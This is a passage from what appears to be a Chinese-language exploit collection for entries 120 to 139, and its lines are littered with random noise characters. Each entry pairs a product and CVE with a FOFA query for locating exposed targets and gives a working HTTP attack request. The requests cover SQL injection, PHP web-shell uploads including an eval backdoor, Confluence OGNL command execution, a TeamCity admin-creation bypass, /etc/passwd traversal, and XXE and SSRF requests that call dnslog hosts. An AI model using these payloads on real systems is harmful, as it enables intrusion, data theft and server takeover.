+ `9 c. W0 o3 aX-Remote-Addr: 1.1.1.1$ }: G1 ~. g/ k: i( i7 R* }2 }
Te: trailers
J# ~% I' W8 Q- c- WConnection: close: I. [! Z/ t0 S1 w. U; U# P3 E
+ d0 G9 b3 r" d% j2 d0 O U/ k4 J
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
4 y& V% N! u7 H) g/ B2 O+ ~- l3 Q( n* ^5 {+ B( I
2 ]) k9 d/ G5 f120. 北京百绰智能S40管理平台导入web.php任意文件上传
5 P7 I- l+ w9 A1 e2 {CVE-2024-1253
2 q4 e; S+ Y$ N6 o+ ~& vFOFA:title="Smart管理平台"
6 ?+ j( y' I4 ?) gPOST /useratte/web.php? HTTP/1.1
* }+ a/ o/ Y" V( n0 E% z) |Host: ip:port
" C. v1 D- O5 F& O2 vCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db7 ~2 Y% Q; g- @9 a* Q, a
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
7 j5 e @: z* c; A1 yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ S: X6 ~) l8 {$ f6 ^) N) tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 O# {! M: \7 [; v. ?" l
Accept-Encoding: gzip, deflate! n4 I8 t- v9 [$ [# O+ i9 `
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
& `# u- x# X% E$ e8 O9 J8 {Content-Length: 597* ?/ `" m* `6 U5 O8 O; J/ o; S
Origin: https://ip:port
- P7 U6 _3 v ~/ @Referer: https://ip:port/sysmanage/licence.php; [& V. K7 H2 {
Upgrade-Insecure-Requests: 16 ^+ B* J. h1 R
Sec-Fetch-Dest: document
$ O. y# `; c, y2 ISec-Fetch-Mode: navigate/ H& \* w" [- e |/ u
Sec-Fetch-Site: same-origin9 u! h1 U+ _+ r9 ?6 S9 \
Sec-Fetch-User: ?1
3 E* U) K! {3 O M6 b; wTe: trailers3 A3 ~1 L; x, ^2 ]$ \, q
Connection: close) o4 K6 `' A# W. N7 a' |- h
4 z; L1 h4 T% [' Y9 w- X: B4 ?0 n
-----------------------------423289041236658752706300793281 ^! f1 K! @9 s& Y! a$ ~
Content-Disposition: form-data; name="file_upload"; filename="2.php"
3 }0 B+ }& O7 D6 `! } ^/ dContent-Type: application/octet-stream8 P9 k; e' {$ l- O8 x9 {
- C M- }; {7 o! J% L& ?0 K<?php phpinfo()?>
' @/ h& l. s3 Y H6 u4 [2 Z" ~-----------------------------42328904123665875270630079328
5 @+ V0 B; k7 r! I# X$ eContent-Disposition: form-data; name="id_type"$ K! g9 w+ q3 L9 B
# D% k8 z; F$ r5 D" l' P( ?9 p
1 }. o$ y; s4 \! _5 b
-----------------------------42328904123665875270630079328
! B: n* O6 j) o% c6 {7 QContent-Disposition: form-data; name="1_ck"' A5 ^* H; C: t1 O3 `" D
6 ^0 B3 f7 t8 Y# ^) v: w# P1_radhttp
% K; L' r) O3 |-----------------------------42328904123665875270630079328
0 v5 O8 }& Q/ I; qContent-Disposition: form-data; name="mode"* w! f8 N* X8 e4 Z4 Q2 X# t
2 e* B8 A+ Y% O, N3 I7 }
import
! E* t; S: C# v6 u-----------------------------423289041236658752706300793289 Q6 |( d P- G9 {- t! c, N
4 X0 h0 z5 u0 W r" V m
* }& w, K! ?- V文件路径/upload/2.php
7 g; {6 F* [3 E# l$ J: C u2 f) l& ~/ D6 y
121. 北京百绰智能S42管理平台userattestation.php任意文件上传1 E6 ?8 v; k9 Z% D0 V
CVE-2024-1918# m( ^* m2 {5 k+ v0 m/ h3 j
FOFA:title="Smart管理平台"
; r; d% P8 F, j" |% o. O: _: aPOST /useratte/userattestation.php HTTP/1.1
" J' i& ]! ~5 c+ q$ [Host: 192.168.40.130:8443
/ V4 a: K d: C; hCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50' y7 d, Q( V$ [: K" t- |
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko G. V6 I* I2 u" h* F" _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, ? x* z ~0 E xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 e, t7 i& C% o
Accept-Encoding: gzip, deflate7 Z$ [% a9 ~- U5 @- u' J$ I4 J
Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793280 D6 x2 G9 k7 F7 O) C P( O2 p, v0 P
Content-Length: 5925 q$ l: S8 V4 Q9 @# Q* ?
Origin: https://192.168.40.130:84432 n# M2 ?% t- m
Upgrade-Insecure-Requests: 1
6 i) h0 p5 T# r) L$ eSec-Fetch-Dest: document0 p: X w+ X# \1 p
Sec-Fetch-Mode: navigate
! ] ^" B) k& ~4 S3 Y0 ySec-Fetch-Site: same-origin" z3 E% @! W8 {( z/ z
Sec-Fetch-User: ?1& h" @7 \$ k- o) R# ^5 p x
Te: trailers' K9 M+ A' H" i7 U G
Connection: close) }$ J8 b) G u9 V* M% i" h3 d
9 [" ~9 q- n7 ?0 O% ?5 y2 [% u-----------------------------42328904123665875270630079328. p9 J, H4 E, B2 m( O$ R$ ]
Content-Disposition: form-data; name="web_img"; filename="1.php"
8 p8 S- t# C( uContent-Type: application/octet-stream! F; ~! Z/ ~6 x2 O' g+ s \
0 O) p1 M4 z% I( p1 x. i
<?php phpinfo();?>/ B/ }! H/ l% W0 j' u: d8 G
-----------------------------42328904123665875270630079328; V7 B) G; r: V4 L
Content-Disposition: form-data; name="id_type"
, }+ ^3 x# p/ T) ]. o
8 i& b+ @6 h* l- W: S/ S1" o0 [$ ~) x! q! o& t
-----------------------------42328904123665875270630079328
# B. K4 L0 b) \6 {Content-Disposition: form-data; name="1_ck"! K: p% F. U# ~, C( t* n
" l9 W5 k7 o$ X
1_radhttp
/ W& n) }2 J+ J+ g8 S-----------------------------42328904123665875270630079328
\4 {1 K& Z. ~; t" d) v6 J# bContent-Disposition: form-data; name="hidwel"2 v7 N' w- B) R+ ^
- z( U0 b3 V5 u# ~8 e6 qset
- {! z/ {6 D1 B8 T+ v-----------------------------423289041236658752706300793282 H+ o; y: e1 `0 j7 k
7 L2 m) g. j r4 j
" a0 v' F3 F- M) aboot/web/upload/weblogo/1.php
. w. g$ d) P+ O: a# {! d4 r# `
: C: X# ?! \$ d2 |- W& h' A122. 北京百绰智能s200管理平台/importexport.php sql注入
. r3 Q1 R! ]# \CVE-2024-27718FOFA:title="Smart管理平台"
0 M4 t+ q% j1 d% r: a) g其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()& Q# I% @ p. p
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
- T0 z# u: f- lHost: x.x.x.x
8 C: \8 u" b) T1 U" o: ^Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0, q( l* T5 T3 ]- O' H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
/ x# A& L/ {/ ?. j- fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 P* M3 b8 {& T# RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- E- @: A, w. iAccept-Encoding: gzip, deflate, br+ y8 N1 E# O" [2 r8 E/ F( d
Upgrade-Insecure-Requests: 1# O: J. x* ]- Y8 J, `+ i3 u" b
Sec-Fetch-Dest: document, i. @0 D7 j! O: F/ \
Sec-Fetch-Mode: navigate
/ M' c/ ~1 @4 I- ^Sec-Fetch-Site: none+ X5 T. [3 U3 l, J
Sec-Fetch-User: ?1/ |5 ~6 P7 A5 O
Te: trailers4 E- \ U# W4 v R+ t9 t
Connection: close
+ }) F7 y! F& i( x% M8 o# _ u: J5 L- Q
2 ~% d/ m2 n, J1 g- c
123. Atlassian Confluence 模板注入代码执行" Y/ }& l! ]8 w7 ` ^! U
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"7 V1 Y2 C7 y2 X6 l7 K6 ]# K0 k
POST /template/aui/text-inline.vm HTTP/1.1/ ]4 E8 u: ]8 @7 z7 d- J
Host: localhost:8090 M8 Q) g5 h# H" L$ D6 O+ s; u3 @
Accept-Encoding: gzip, deflate, br' _! J, O g, B7 L2 c
Accept: */*
2 h: @* F \4 j, cAccept-Language: en-US;q=0.9,en;q=0.8
. X. v6 |1 n( D- dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
& x' Z9 P; Z! tConnection: close2 e+ N+ X. p- F, u, y
Content-Type: application/x-www-form-urlencoded2 B$ V/ [* w3 e% y! |3 u1 R
3 A5 o% a+ \, a* I/ ?label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))# w! m9 z# K2 ?6 b
- }% }: z; C" N
& @: ^' ]& v+ O, H5 v8 @+ T124. 湖南建研工程质量检测系统任意文件上传
+ z) v9 C$ ^: ?1 TFOFA:body="/Content/Theme/Standard/webSite/login.css"
9 F" D% ~4 V/ i2 v% M" OPOST /Scripts/admintool?type=updatefile HTTP/1.1/ ?4 J) j; X' z/ u- S7 n
Host: 192.168.40.130:8282
0 N' y# d: s1 Z6 dUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.363 [- {' Y" H0 `! A; h; j
Content-Length: 72; J! w5 z/ ^" |8 }1 W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
1 _( v* R3 L; g- uAccept-Encoding: gzip, deflate, br4 O. L7 I; a8 ]% N% v# I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ X3 v6 I; E- x1 N/ rConnection: close
! |, S& c7 e2 z0 C+ Y+ o! yContent-Type: application/x-www-form-urlencoded
0 E- Q9 m. Z: @( Z% b5 q d( S$ Y' P5 i
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>; ]* q M* C/ _2 d( Y
0 ^: z2 a* Y6 ~+ X1 k
6 p- V, A: Z: ]( S8 }http://192.168.40.130:8282/Scripts/abcgcg.aspx8 V0 e2 ]1 G) l; C3 [' r, e
1 _) t$ R4 M# _3 Q! k9 d125. ConnectWise ScreenConnect身份验证绕过% R/ y5 ]5 k9 N" j. ~$ L) x
CVE-2024-1709
; {- L9 Z+ L: I. k7 oFOFA:icon_hash="-82958153", K4 s. w2 J5 [6 Y7 h' L- p5 o
https://github.com/watchtowrlabs ... bypass-add-user-poc
6 I( x4 T( g3 F9 ?8 ?' g' G, M, g# r' c6 A0 U! o
. [4 W4 S x& d! }; C1 v
使用方法8 x/ i1 }& w8 R; P% L
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!* d4 ]4 |$ l/ b5 Z3 m$ E
- g {7 N- U6 R. [
E3 Z1 u( E# k }5 I# p# @
创建好用户后直接登录后台,可以执行系统命令。
9 }: u* {- d- K3 c; G
& Z* U7 x: j: |+ w6 E8 D$ t126. Aiohttp 路径遍历3 M0 _+ t' u. L
FOFA:title=="ComfyUI"0 s2 e7 P. ~2 q$ R
GET /static/../../../../../etc/passwd HTTP/1.1
) G4 G: L) ^; L8 s+ xHost: x.x.x.x, h' U) i- @7 g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
3 M9 C+ i( K$ Z. d* LConnection: close! C }6 n7 k7 a5 Y8 W
Accept: */*
5 t8 Z$ {2 c: c. Q- j9 s, aAccept-Language: en
& C) L# Z; B6 r( F6 R8 gAccept-Encoding: gzip& ^" y1 \+ y9 F) O6 Y: b
- |- Y) j4 u) R: v; x
& u7 ^- h7 k1 ^127. 广联达Linkworks DataExchange.ashx XXE
# g; F4 o* R" qFOFA:body="Services/Identification/login.ashx" v# v, l, e7 @7 e# M
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
" r' X9 X* o% j" R/ f, k: `. QHost: 192.168.40.130:88884 h/ |( S' Z* \& \- z$ X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
2 v! L$ m4 j0 I. `Content-Length: 415
$ L% S+ i9 n7 d% [# ~' ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; H ^7 I6 J% \. [
Accept-Encoding: gzip, deflate7 t# F& m! I1 M4 T$ R2 {
Accept-Language: zh-CN,zh;q=0.96 P2 m" T1 [& g
Connection: close- D5 c0 P( [* B4 L. w1 I) k f
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
& q: u3 ~2 N( v! vPurpose: prefetch
: q! e. K D A$ B sSec-Purpose: prefetch;prerender
4 d! U3 b6 e# d0 q i* v% o$ m: }7 J
------WebKitFormBoundaryJGgV5l5ta05yAIe0
2 X* h5 `" r. e5 yContent-Disposition: form-data;name="SystemName"- V0 z0 H2 Y; L& h) O1 l
+ ~$ C5 Q6 J' J/ b i9 R1 ~, |) \% wBIM }% \* d9 a: `3 o+ i# L Q6 n
------WebKitFormBoundaryJGgV5l5ta05yAIe0! S- r/ E" d! S/ M+ P! I
Content-Disposition: form-data;name="Params"
, L1 V" H0 t0 V4 |Content-Type: text/plain
+ K% R9 h' F7 U: U( W
0 w9 J' F) } v' b& h<?xml version="1.0" encoding="UTF-8"?>& l. v% C8 ^/ I/ T/ Q
<!DOCTYPE test [
/ A5 r8 T+ ]7 ~0 l/ I7 ~0 @<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">; z( z; D# P0 |1 c. b
]6 ?# L0 k% d4 }% p6 N; B
>
" m* o+ X$ ~+ j: i<test>&t;</test>
3 G9 @- i) [+ z6 _; H* a0 H+ O8 F------WebKitFormBoundaryJGgV5l5ta05yAIe0--0 _% A7 e' o: { O) S
9 m8 I4 n& f& x+ y' A9 H7 Y
/ z) h6 n, e, p; s" c
# s4 j% h t4 \* n8 @
128. Adobe ColdFusion 反序列化
. S6 x$ l$ r% V; U1 F) {CVE-2023-38203
4 t- i+ Q2 x: k6 O5 @. P6 JAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
( k( J- d- B) Q' W! TFOFA:app="Adobe-ColdFusion"/ g3 Z" G$ O: F) u% f0 o' b
PAYLOAD
" p6 X: ~# d; q% e6 F5 V
i# {+ p* ]6 ^9 O7 j' [+ f q129. Adobe ColdFusion 任意文件读取$ ]/ Y5 R# h3 }
CVE-2024-20767. p- z* [, c8 W
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
# i- s1 A! q2 b1 K$ E8 R第一步,获取uuid( \3 a/ m9 \' p5 ]4 P/ P
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1& Z5 K0 c5 X" m" _1 ^) n0 J
Host: x.x.x.x. }) f! ]; }- B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.361 H3 l8 Y7 k: s" V5 ^" S
Accept: */*/ C2 }, S3 K u+ r4 `8 l( w
Accept-Encoding: gzip, deflate U" m3 h; y. Q
Connection: close' p* h- Y5 _+ a4 k* A! q
6 g d) P w1 Y- W3 N& s4 s& Z
' r' m C9 V8 {9 w" u, k. K/ }第二步,读取/etc/passwd文件
' O/ c7 s; e3 T0 E$ N0 MGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
, \' t1 S: r; N3 N$ s/ y3 @& iHost: x.x.x.x3 E4 Q# i5 i6 z1 X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 V- O+ {* E( X' ~Accept: */*4 U. f/ ]8 t3 C2 q9 f
Accept-Encoding: gzip, deflate
( j4 ^$ Z/ l4 |2 J) Q/ A' kConnection: close
7 k2 \2 u# q8 z/ G+ muuid: 85f60018-a654-4410-a783-f81cbd5000b9
8 r% g0 D) `+ @% W9 f7 ?+ S
A$ T1 G2 I6 d
4 \0 }+ G9 B, C" l( P130. Laykefu客服系统任意文件上传6 k- Z- B# s) X# Z( h
FOFA:icon_hash="-334624619"3 |) j8 W# N+ m% g
POST /admin/users/upavatar.html HTTP/1.1
" U2 D' @2 U$ y6 s6 \5 s( sHost: 127.0.0.1/ A1 A3 u3 Q) M2 E) e) t5 g
Accept: application/json, text/javascript, */*; q=0.01) g8 G/ G! n+ c7 u; W7 L6 @2 S4 f
X-Requested-With: XMLHttpRequest
$ W [+ |$ t4 |* B8 o E& C+ oUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26" q c" e# x$ k3 C+ ^+ C: g
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
O2 [+ z! o8 ~+ `7 S) K$ vAccept-Encoding: gzip, deflate) `+ `1 K" T: n" b) g' h9 s
Accept-Language: zh-CN,zh;q=0.9
- r- I+ g( d- H% gCookie: user_name=1; user_id=3$ j2 E6 F; {( [0 r2 Y
Connection: close
6 s6 C9 O% V) n! U$ b9 ~+ Q1 W4 ~9 N1 k- M! y% t4 _0 d7 t% Z# D5 a
------WebKitFormBoundary3OCVBiwBVsNuB2kR; Q# M+ J" b1 V) i( g
Content-Disposition: form-data; name="file"; filename="1.php"9 J, y. U1 d* J" \; x# G# ?
Content-Type: image/png
2 d+ z- q. C b
; K' t% [' {! c$ j<?php phpinfo();@eval($_POST['sec']);?>
+ T6 g1 i! O4 R3 `------WebKitFormBoundary3OCVBiwBVsNuB2kR--
. T" {0 J4 f4 j; T4 t( Q/ M- i+ Z
0 H. {' n5 C7 c
5 |7 |* A: k$ q. X* E131. Mini-Tmall <=20231017 SQL注入
1 M' T, h z( N0 M) S9 s; d n DFOFA:icon_hash="-2087517259"
7 o7 Q! W3 c V1 }/ P* u后台地址:http://localhost:8080/tmall/admin9 v( i# {$ g+ Q$ j5 `& r1 N
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
1 X& O( g& `3 ?! e6 d1 H Q
8 d v- L g# A" i/ f4 Z( Q& s132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过; P3 h5 L* D- k" N7 H! n
CVE-2024-271980 b1 X6 ~. G( W% |( B
FOFA:body="Log in to TeamCity") c( b+ d! @5 B# @
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.11 ^. \4 u. `4 l$ g3 x A
Host: 192.168.40.130:81115 o/ h8 V7 Y3 Q# |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36* ?/ v% ~: }! Q
Accept: */*( Y# f% u- l9 t6 g
Content-Type: application/json
- ` B+ |* H% H# Y" PAccept-Encoding: gzip, deflate7 d8 A' p' s2 s% t" j
6 p/ z! X" B3 A& W3 a6 v{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
9 N1 L/ L& s; N0 W# M) X$ L
4 `) M* A6 q; c3 }7 S' N# b1 H( G
( x3 `6 n( ~/ G5 p S: uCVE-2024-27199
1 k# G! Q( J! O3 f- r6 O) F/res/../admin/diagnostic.jsp
# g, R3 u9 \5 q% S6 P/.well-known/acme-challenge/../../admin/diagnostic.jsp6 n- R) H* I0 b1 b
/update/../admin/diagnostic.jsp+ V6 |6 N6 j2 a9 K4 V* b
" w( o4 l+ O( E; Y9 c; w. |3 r3 _7 b8 o
CVE-2024-27198-RCE.py
; y9 G' }5 m4 f! T4 t7 x- r! \7 S
133. H5 云商城 file.php 文件上传
1 L& t! |3 W4 a* S# R& e# SFOFA:body="/public/qbsp.php"
0 m, e1 x1 w4 r# d. N. uPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1! D! L4 c. d# y$ d3 v3 f
Host: your-ip5 f* A, p/ k7 V) f* R: s0 ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36) K' ^7 ?. T% @. Y$ h( Y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx0 G! [/ R" X# [9 t) m9 |' T# V% S
; ^6 r$ j7 _ G- \3 X------WebKitFormBoundaryFQqYtrIWb8iBxUCx
: T8 u: c, c( O8 gContent-Disposition: form-data; name="file"; filename="rce.php"
+ ?% }9 I& h5 f# M. |1 k& \Content-Type: application/octet-stream
: [" A( h3 R, t$ C' l& J$ ]6 S % u) R, P# m E5 Q$ s6 v8 G
<?php system("cat /etc/passwd");unlink(__FILE__);?>
" P9 S) I( _: s% L: l+ `- c* C------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
% H% {5 A0 C6 V1 \7 a
- ?0 U* n. i9 r0 A. T) S9 G: f" }6 D: z
T0 O5 L& m; j! D L134. 网康NS-ASG应用安全网关index.php sql注入
" t4 g- M" @" h. xCVE-2024-2330
' X2 Q+ A9 _2 b$ S; XNetentsec NS-ASG Application Security Gateway 6.3版本
9 |) `+ _- q2 w1 LFOFA:app="网康科技-NS-ASG安全网关"
& s) n6 E, h. _* B" jPOST /protocol/index.php HTTP/1.1
# A! ^6 \1 _5 i. P. H) e; h* RHost: x.x.x.x; X2 v3 d0 V& T2 Q2 l& K P
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de. m- `# _7 f4 ^" ]) m0 t- ^8 C) m0 D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
7 M0 o+ l; L0 M7 MAccept: */*
# g- h# [6 d A2 L( L& FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 @+ D% T3 @$ E1 N( m( c
Accept-Encoding: gzip, deflate
: ]$ F* F% l7 i; P3 }Sec-Fetch-Dest: empty: b: K+ B+ B s6 K% W1 J$ [
Sec-Fetch-Mode: cors
" h7 k( R/ c% U2 r x3 A7 t; SSec-Fetch-Site: same-origin
2 R% v5 D2 I: w4 E* CTe: trailers, _2 [2 ]; ^% G
Connection: close
5 d: x q: t4 p( U/ P( lContent-Type: application/x-www-form-urlencoded
! o% {0 t/ D Z& p( a6 o* o4 BContent-Length: 263
( @. }2 B0 x8 {, N3 u8 t
, ]# }# H t9 v/ B. ]$ mjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
1 t$ x0 s" j" n4 {' b. L/ g+ ?5 R$ X* ]
- G4 ^; ] g9 J6 ~
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入; t3 p) }7 J- q7 Q; P
CVE-2024-2022. Q% o7 u6 ^2 o# t8 r
Netentsec NS-ASG Application Security Gateway 6.3版本. g8 x8 |) U7 G$ |$ }" e+ c* I- W
FOFA:app="网康科技-NS-ASG安全网关"7 c* l Q4 ]( a8 {' j& G2 `
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1$ N. f2 N0 o+ D/ F3 e7 w2 X
Host: x.x.x.x, z7 ^9 K- d( s7 V) W! ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
4 g0 x2 ?. q/ P1 N8 ]& L- RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 r. ?5 j4 \, n* Q7 b' O! _Accept-Encoding: gzip, deflate
4 f/ U1 e- _9 t$ I$ c: w# ?Accept-Language: zh-CN,zh;q=0.9& Z1 T$ A/ u& j! M0 p# M/ l
Connection: close1 W" u% W. z$ y( [9 V+ R) y/ _
$ n1 z! h. O A( l+ j4 c
6 ~. S+ E% X9 v* z7 k% I1 ^0 q8 |8 B136. NextChat cors SSRF0 H9 Y& v: y1 x2 ?6 }( ^- x
CVE-2023-497853 r; }! N" k5 t( @7 j
FOFA:title="NextChat"
, m- W) C8 K; B% wGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
! K+ g1 _! @! I0 IHost: x.x.x.x:100006 x4 ~% U9 K- t
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
) B, V( f0 i+ I/ M, BConnection: close7 j/ B, j: c! ~- z: x, O: D( \8 I
Accept: */*
7 @: g1 l. h' _3 F/ @. A$ l6 vAccept-Language: en
3 I2 a2 m5 A! mAccept-Encoding: gzip! u ]! d) i" N% C- \7 I' x7 ]
3 Z$ H1 C! r9 j# n9 p
& {+ m* \( `$ b& b9 e. d+ J6 Z- }% t) K137. 福建科立迅通信指挥调度平台down_file.php sql注入( K. {9 I) N- M% T- ~
CVE-2024-2620, m9 Y3 Y* A6 D3 P+ v3 `9 v m
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
3 @# |' j: `) H m" r/ I: E% sGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
! G! O0 e( e8 S7 ^8 Z9 ~: }/ X, j2 c" tHost: x.x.x.x0 \, g/ `0 R$ ~4 I) Z1 m, [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
: Z C/ o4 V/ X7 z3 A2 vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 z& r+ P; D/ N8 |2 q4 f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ |4 R: ~! C$ o% q8 n( D; r
Accept-Encoding: gzip, deflate, br
- a; Y* ^ j/ G/ J! R" l2 CConnection: close
: ]+ C+ b( L# f' X; {Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj) x- z y4 ~5 X: d
Upgrade-Insecure-Requests: 1! t4 w( m1 X% s. R0 C3 ]# L
( z7 k3 K# r- k% F/ @( X6 o% R$ J- X' n; [
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
' T2 [- B4 f# R3 nCVE-2024-2621
- i0 g, k1 {0 K4 I( CFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
( o. S0 W9 `, p" u2 Y% i1 }GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.19 C; v) S8 d+ o: \" H
Host: x.x.x.x
V, A j# Y' G5 Z4 v% _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
3 ~% W" e% p9 `( W, b/ z! ^" F, L( VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 X: c' ]# A5 H8 DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& M, X V0 e9 t# r$ AAccept-Encoding: gzip, deflate, br
* O1 J7 X! S% C0 pConnection: close
+ B4 D+ j) |% \1 n) h# QUpgrade-Insecure-Requests: 13 x {, ~5 E$ Q$ a# `
; w7 ?# o! J; _9 X m! z
: H# I) v+ ~1 N: ?
139. 福建科立讯通信指挥调度平台editemedia.php sql注入/ N2 ~/ G+ n+ W* t- z$ Z# o" d! S
CVE-2024-2622" E2 D$ j D4 |: b
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
9 X% }0 u4 q: w; GGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1 t* ~8 p- q9 D
Host: x.x.x.x
